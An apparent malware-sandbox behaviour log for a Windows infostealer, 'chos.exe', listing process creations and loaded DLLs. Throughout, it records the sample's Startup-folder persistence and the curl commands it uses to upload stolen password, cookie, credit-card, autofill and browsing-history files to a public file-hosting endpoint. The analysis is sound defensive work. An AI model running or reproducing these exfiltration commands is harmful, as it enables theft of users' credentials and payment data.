Source: C:\Users\user\Desktop\chos.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chos.exe

ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\chos.exe

File read: C:\Users\user\Desktop\chos.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\chos.exe "C:\Users\user\Desktop\chos.exe"
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Users\user\Desktop\chos.exe "C:\Users\user\Desktop\chos.exe"
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe"
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe"
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Users\user\Desktop\chos.exe "C:\Users\user\Desktop\chos.exe"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile

Source: C:\Users\user\Desktop\chos.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
